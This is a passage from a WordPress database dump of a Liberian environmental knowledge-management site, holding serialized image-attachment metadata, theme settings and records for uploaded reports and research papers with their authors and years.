500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:17:\"fda-1-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:17:\"fda-1-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:17:\"fda-1-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(35091,5131,'_thumbnail_id','5132'),(35092,5131,'_edit_last','42'),(35095,5131,'kava_extra_enable_breadcrumbs','inherit'),(35096,5131,'post_formats',''),(35097,5131,'gallery_tab',''),(35098,5131,'kava_extra_gallery_images',''),(35099,5131,'link_tab',''),(35100,5131,'kava_extra_link',''),(35101,5131,'kava_extra_link_target','_blank'),(35102,5131,'quote_tab',''),(35103,5131,'kava_extra_quote_text',''),(35104,5131,'kava_extra_quote_cite',''),(35105,5131,'audio_tab',''),(35106,5131,'kava_extra_audio',''),(35107,5131,'kava_extra_audio_loop','false'),(35108,5131,'kava_extra_audio_autoplay','false'),(35109,5131,'kava_extra_audio_preload','false'),(35110,5131,'video_tab',''),(35111,5131,'kava_extra_video_type','library'),(35112,5131,'kava_extra_video_library',''),(35113,5131,'kava_extra_video_external',''),(35114,5131,'kava_extra_video_poster',''),(35115,5131,'kava_extra_video_width','770'),(35116,5131,'kava_extra_video_height','480'),(35117,5131,'kava_extra_video_loop','false'),(35118,5131,'kava_extra_video_autoplay','false'),(35119,5131,'kava_extra_video_preload','false'),(35120,5131,'_wp_old_date','2022-09-23'),(35121,5134,'_edit_lock','1663935578:42'),(35122,5134,'_last_editor_used_jetpack','block-editor'),(35123,5135,'_wp_attached_file','2022/09/FDA.jpg'),(35124,5135,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2022/09/FDA.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"FDA-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"FDA-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"FDA-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"FDA-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"FDA-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"FDA-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"FDA-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"FDA-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"FDA-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:15:\"FDA-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"FDA-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(35127,5134,'_wp_old_date','2022-09-23'),(35128,5134,'_thumbnail_id','5135'),(35129,5134,'_edit_last','42'),(35130,5134,'kava_extra_enable_breadcrumbs','inherit'),(35131,5134,'post_formats',''),(35132,5134,'gallery_tab',''),(35133,5134,'kava_extra_gallery_images',''),(35134,5134,'link_tab',''),(35135,5134,'kava_extra_link',''),(35136,5134,'kava_extra_link_target','_blank'),(35137,5134,'quote_tab',''),(35138,5134,'kava_extra_quote_text',''),(35139,5134,'kava_extra_quote_cite',''),(35140,5134,'audio_tab',''),(35141,5134,'kava_extra_audio',''),(35142,5134,'kava_extra_audio_loop','false'),(35143,5134,'kava_extra_audio_autoplay','false'),(35144,5134,'kava_extra_audio_preload','false'),(35145,5134,'video_tab',''),(35146,5134,'kava_extra_video_type','library'),(35147,5134,'kava_extra_video_library',''),(35148,5134,'kava_extra_video_external',''),(35149,5134,'kava_extra_video_poster',''),(35150,5134,'kava_extra_video_width','770'),(35151,5134,'kava_extra_video_height','480'),(35152,5134,'kava_extra_video_loop','false'),(35153,5134,'kava_extra_video_autoplay','false'),(35154,5134,'kava_extra_video_preload','false'),(35155,5137,'_edit_lock','1663939143:42'),(35156,5137,'_last_editor_used_jetpack','block-editor'),(35157,5138,'_wp_attached_file','2022/09/FDA-1.jpg'),(35158,5138,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2022/09/FDA-1.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"FDA-1-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"FDA-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"FDA-1-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"FDA-1-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"FDA-1-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"FDA-1-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"FDA-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:17:\"FDA-1-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:17:\"FDA-1-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:17:\"FDA-1-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:17:\"FDA-1-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(35161,5137,'_wp_old_date','2022-09-23'),(35162,5137,'_thumbnail_id','5138'),(35163,5137,'_edit_last','42'),(35164,5137,'kava_extra_enable_breadcrumbs','inherit'),(35165,5137,'post_formats',''),(35166,5137,'gallery_tab',''),(35167,5137,'kava_extra_gallery_images',''),(35168,5137,'link_tab',''),(35169,5137,'kava_extra_link',''),(35170,5137,'kava_extra_link_target','_blank'),(35171,5137,'quote_tab',''),(35172,5137,'kava_extra_quote_text',''),(35173,5137,'kava_extra_quote_cite',''),(35174,5137,'audio_tab',''),(35175,5137,'kava_extra_audio',''),(35176,5137,'kava_extra_audio_loop','false'),(35177,5137,'kava_extra_audio_autoplay','false'),(35178,5137,'kava_extra_audio_preload','false'),(35179,5137,'video_tab',''),(35180,5137,'kava_extra_video_type','library'),(35181,5137,'kava_extra_video_library',''),(35182,5137,'kava_extra_video_external',''),(35183,5137,'kava_extra_video_poster',''),(35184,5137,'kava_extra_video_width','770'),(35185,5137,'kava_extra_video_height','480'),(35186,5137,'kava_extra_video_loop','false'),(35187,5137,'kava_extra_video_autoplay','false'),(35188,5137,'kava_extra_video_preload','false'),(35189,5140,'_last_editor_used_jetpack','classic-editor'),(35190,5140,'_edit_lock','1664287322:42'),(35191,5141,'_wp_attached_file','2022/09/Final-Report-NCSA-lIBERIA.pdf'),(35192,5140,'_edit_last','42'),(35195,5143,'_wp_attached_file','2022/09/Screenshot-2022-09-26-at-11-20-30-Final-Report-NCSA-lIBERIA.pdf.png'),(35196,5143,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:75:\"2022/09/Screenshot-2022-09-26-at-11-20-30-Final-Report-NCSA-lIBERIA.pdf.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:75:\"Screenshot-2022-09-26-at-11-20-30-Final-Report-NCSA-lIBERIA.pdf-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:75:\"Screenshot-2022-09-26-at-11-20-30-Final-Report-NCSA-lIBERIA.pdf-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:75:\"Screenshot-2022-09-26-at-11-20-30-Final-Report-NCSA-lIBERIA.pdf-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:74:\"Screenshot-2022-09-26-at-11-20-30-Final-Report-NCSA-lIBERIA.pdf-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:75:\"Screenshot-2022-09-26-at-11-20-30-Final-Report-NCSA-lIBERIA.pdf-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:75:\"Screenshot-2022-09-26-at-11-20-30-Final-Report-NCSA-lIBERIA.pdf-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:75:\"Screenshot-2022-09-26-at-11-20-30-Final-Report-NCSA-lIBERIA.pdf-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(35197,5140,'_wp_page_template','default'),(35198,5140,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/09/Final-Report-NCSA-lIBERIA.pdf'),(35199,5140,'by','EPA'),(35200,5140,'year','2022'),(35201,5140,'_pods_document_cover_image','a:1:{i:0;i:5143;}'),(35202,5140,'document_cover_image','5143'),(35203,5140,'_pods_attached_document','a:1:{i:0;i:5141;}'),(35204,5140,'attached_document','5141'),(35205,5146,'_last_editor_used_jetpack','classic-editor'),(35206,5146,'_edit_lock','1665571646:42'),(35207,5146,'_edit_last','42'),(35208,5147,'_wp_attached_file','2022/10/AnalysisofSelectedP...pdf'),(35209,5148,'_wp_attached_file','2022/10/GlobalJournalforResearchAnalysis_.pdf'),(35210,5149,'_wp_attached_file','2022/10/Physiochemical_and_bacteriological_analyses_of_sel.pdf'),(35211,5150,'_wp_attached_file','2022/10/Untitled.png'),(35212,5150,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:20:\"2022/10/Untitled.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Untitled-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Untitled-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"Untitled-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"Untitled-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"Untitled-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"Untitled-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:20:\"Untitled-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(35213,5146,'_wp_page_template','default'),(35214,5146,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/10/AnalysisofSelectedP...pdf'),(35215,5146,'by','Sampson K. P. Chea, Jacob Kolawole, Ginny Campbell, Farkollie Sumo & Rafael Ngumbu'),(35216,5146,'year','2017'),(35217,5146,'_pods_document_cover_image','a:1:{i:0;i:5150;}'),(35218,5146,'document_cover_image','5150'),(35219,5146,'_pods_attached_document','a:1:{i:0;i:5147;}'),(35220,5146,'attached_document','5147'),(35222,5153,'_last_editor_used_jetpack','classic-editor'),(35223,5153,'_edit_lock','1665572692:42'),(35224,5153,'_edit_last','42'),(35225,5154,'_wp_attached_file','2022/10/Untitled-1.png'),(35226,5154,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:22:\"2022/10/Untitled-1.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-1-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"Untitled-1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"Untitled-1-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(35227,5153,'_wp_page_template','default'),(35228,5153,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/10/GlobalJournalforResearchAnalysis_.pdf'),(35229,5153,'by','Sampson K.P. Chea, Rafael S. Ngumbu, Lenn G. Gomah, Bode Shabayo, Yekeh F. Howard, Steward Borbor, & Janice Nma'),(35230,5153,'year','2021'),(35231,5153,'_pods_document_cover_image','a:1:{i:0;i:5154;}'),(35232,5153,'document_cover_image','5154'),(35233,5153,'_pods_attached_document','a:1:{i:0;i:5148;}'),(35234,5153,'attached_document','5148'),(35236,5157,'_last_editor_used_jetpack','classic-editor'),(35237,5157,'_edit_lock','1665574848:42'),(35238,5157,'_edit_last','42'),(35239,5158,'_wp_attached_file','2022/10/Untitled-2.png'),(35240,5158,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:22:\"2022/10/Untitled-2.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-2-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-2-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"Untitled-2-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"Untitled-2-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"Untitled-2-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"Untitled-2-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(35241,5157,'_wp_page_template','default'),(35242,5157,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/10/Untitled-2.png'),(35243,5157,'by','Samson K.P. Chea & Terrance Paye'),(35244,5157,'year','2018'),(35245,5157,'_pods_document_cover_image','a:1:{i:0;i:5158;}'),(35246,5157,'document_cover_image','5158'),(35247,5157,'_pods_attached_document','a:1:{i:0;i:5158;}'),(35248,5157,'attached_document','5158'),(35252,5163,'_last_editor_used_jetpack','classic-editor'),(35253,5163,'_edit_lock','1665591621:42'),(35254,5163,'_edit_last','42'),(35255,5164,'_wp_attached_file','2022/10/ndma.jpg'),(35256,5164,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:16:\"2022/10/ndma.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"ndma-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"ndma-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(35257,5165,'_wp_attached_file','2022/10/ndma-1.jpg'),(35258,5165,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:18:\"2022/10/ndma-1.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"ndma-1-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"ndma-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"ndma-1-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"ndma-1-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:17:\"ndma-1-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:18:\"ndma-1-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:18:\"ndma-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:18:\"ndma-1-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:18:\"ndma-1-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:18:\"ndma-1-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:18:\"ndma-1-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(35259,5163,'_thumbnail_id','5165'),(35260,5163,'_wp_page_template','default'),(35261,5163,'internet','https://web.facebook.com/profile.php?id=100076201388952'),(35262,5163,'_pods_institution_logo','a:1:{i:0;i:5164;}'),(35264,5163,'institution_logo','5164'),(38714,5818,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:22:\"2026/03/today-new1.jpg\";s:8:\"filesize\";i:368178;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"today-new1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18151;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"today-new1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:142559;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"today-new1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7389;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"today-new1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85393;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"today-new1-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:270511;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"today-new1-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25008;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:21:\"today-new1-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5098;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:22:\"today-new1-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14609;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:22:\"today-new1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36035;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:22:\"today-new1-370x500.